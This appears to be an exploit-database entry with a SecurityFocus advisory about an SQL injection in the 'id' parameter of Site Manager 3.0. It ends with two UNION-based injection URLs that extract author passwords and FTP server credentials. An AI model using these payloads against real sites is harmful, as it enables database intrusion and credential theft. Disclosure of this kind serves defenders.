Site Manager 3.0 - 'id' SQL Injection

Author: Sec Attack Team
type: webapps
platform: cfm
port: 
date_added: 2010-01-31  
date_updated: 2014-07-02  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 33948.txt  
source: https://www.securityfocus.com/bid/39973/info

Site Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Site Manager 3.0 is vulnarable; other versions may also be affected.

http://www.example.com/page.cfm?id=null+and+100=99+union+select+1,2,3,4,concat(name,0x3a,password),6+from+author
http://www.example.com/page.cfm?id=null+and+100=99+union+select+1,2,3,4,conca(ftpserver,0x3a,domainname,0x3a,ftpusername,0x3a,ftppassword),6+from+webdata